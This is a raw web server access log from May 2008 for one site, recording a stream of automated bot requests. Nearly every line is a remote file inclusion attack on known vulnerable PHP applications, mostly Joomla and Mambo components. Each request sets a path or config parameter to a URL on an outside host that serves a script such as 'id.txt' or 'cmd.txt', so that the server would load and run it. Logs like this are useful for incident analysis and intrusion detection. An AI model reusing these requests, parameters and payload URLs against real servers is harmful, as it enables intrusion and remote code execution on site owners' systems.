193.19.139.89 - - [04/May/2008:10:58:41 -0700] "GET //common/db.php?commonpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:10:58:42 -0700] "GET /logs//common/db.php?commonpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:58:43 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:10:58:56 -0700] "GET /logs/access_080321.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:10:59:14 -0700] "GET /logs/access_080218.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:10:59:15 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [04/May/2008:10:59:15 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:10:59:16 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:10:59:16 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:59:23 -0700] "GET /sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:59:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:59:28 -0700] "GET /logs/access_080113.log//templates/mangobery/footer.sample.php?Site_Path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:10:59:28 -0700] "GET //skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:59:36 -0700] "GET /logs/index.php?do=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:10:59:41 -0700] "GET /index.php?do=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:10:59:41 -0700] "GET /logs/access.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.tourville-en-ligne.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:10:59:59 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.151.111 - - [04/May/2008:11:00:09 -0700] "GET /logs/access_080205.log/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:11:00:49 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:11:00:49 -0700] "GET //common/db.php?commonpath=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.154.122 - - [04/May/2008:11:00:49 -0700] "GET /logs//common/db.php?commonpath=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:11:01:13 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:11:01:13 -0700] "GET /include/statistic.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:01:29 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:01:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:01:39 -0700] "GET /logs/access.log/errors.php?error=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.227.217.6 - - [04/May/2008:11:01:42 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.240.12.1 - - [04/May/2008:11:01:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:02:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:11:02:17 -0700] "GET /logs/index.php?meio.php=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [04/May/2008:11:02:20 -0700] "GET /index.php?meio.php=http://weekly.wassla.com/mambots/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:02:40 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.33 - - [04/May/2008:11:02:42 -0700] "GET /logs/access_071103.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:02:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:02:51 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:03:14 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:03:22 -0700] "GET //include.php?path[docroot]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:04:14 -0700] "GET /logs/access_080131.log//squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:04:15 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:04:15 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:11:04:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:11:04:21 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:05:30 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.129.118.88 - - [04/May/2008:11:05:48 -0700] "GET /logs/access_080215.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:06:43 -0700] "GET /logs/access_080131.log/index.php?pagina=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:06:45 -0700] "GET /index.php?pagina=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.123 - - [04/May/2008:11:06:47 -0700] "GET /logs/index.php?pagina=http://home.kookmin.ac.kr/~law/board/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.178.176.36 - - [04/May/2008:11:07:10 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://renewable-energy-news.com/someone.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [04/May/2008:11:07:11 -0700] "GET //index.php?option=com_custompages&cpage=http://renewable-energy-news.com/someone.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
66.178.176.36 - - [04/May/2008:11:07:11 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://renewable-energy-news.com/someone.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:11:08:09 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [04/May/2008:11:08:24 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:08:26 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:08:26 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
141.201.80.161 - - [04/May/2008:11:08:46 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.specterworld.net/elmasry/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.129.208.30 - - [04/May/2008:11:08:54 -0700] "GET /logs/access_080122.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
78.129.208.30 - - [04/May/2008:11:08:54 -0700] "GET /logs/access_080118.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:09:02 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:09:07 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:09:13 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:11:09:34 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:11:09:34 -0700] "GET /logs//include.php?path[docroot]=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:11:09:52 -0700] "GET /logs/access_080216.log/include/Classes.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:09:54 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:09:54 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [04/May/2008:11:09:55 -0700] "GET /logs/access_080216.log/include/statistic.inc.php?tm_includepath=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.101.26.99 - - [04/May/2008:11:10:18 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [04/May/2008:11:11:13 -0700] "GET /logs/access_080308.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:11:36 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:11:37 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:11:37 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:11:59 -0700] "GET /logs/index.php?meio.php=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.7.32.9 - - [04/May/2008:11:11:59 -0700] "GET /http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.7.32.9 - - [04/May/2008:11:12:00 -0700] "GET /logs/http://www.zimbaligolfestate.co.za/administrator/templates/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.17.3.183 - - [04/May/2008:11:12:01 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:12:02 -0700] "GET /index.php?meio.php=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [04/May/2008:11:12:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.152.14 - - [04/May/2008:11:12:17 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.30.245.149 - - [04/May/2008:11:12:39 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [04/May/2008:11:13:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://203.71.212.3/www/modul/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:13:57 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [04/May/2008:11:13:57 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:13:58 -0700] "GET /logs/access.log//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:13:58 -0700] "GET //includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:13:58 -0700] "GET /logs//includes/phpmailer/class.phpmailer.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:11:14:05 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
81.169.141.165 - - [04/May/2008:11:14:05 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.imageforum.ru//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:14:14 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:14:19 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [04/May/2008:11:14:25 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:14:53 -0700] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:14:53 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
79.210.191.36 - - [04/May/2008:11:14:58 -0700] "GET /logs/access.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.dmulk.com"
80.129.118.88 - - [04/May/2008:11:15:14 -0700] "GET /logs/access.loghttp://musicroom.eclub.lv/body? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:11:15:55 -0700] "GET /logs/db.php?path_local=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.133.127.44 - - [04/May/2008:11:15:56 -0700] "GET /db.php?path_local=http://www.snd.fr/upload/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:11:16:18 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:11:16:19 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.39.30 - - [04/May/2008:11:16:20 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:16:42 -0700] "GET /logs/db.php?path_local=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:16:42 -0700] "GET /db.php?path_local=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:16:46 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [04/May/2008:11:16:54 -0700] "GET //include.php?path[docroot]=http://benedon.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:18:51 -0700] "GET /logs/access_071215.log/modifyform.html?code=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:18:52 -0700] "GET /logs/index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:18:53 -0700] "GET /modifyform.html?code=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.7.108.234 - - [04/May/2008:11:18:54 -0700] "GET /logs/modifyform.html?code=http://www.imkereibedarf-heuzeroth.de//contenido/cronjobs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.60.169 - - [04/May/2008:11:19:06 -0700] "GET /index.php?body=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.34.124.100 - - [04/May/2008:11:19:09 -0700] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.ecwebtek.com/guestbook/tmp/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
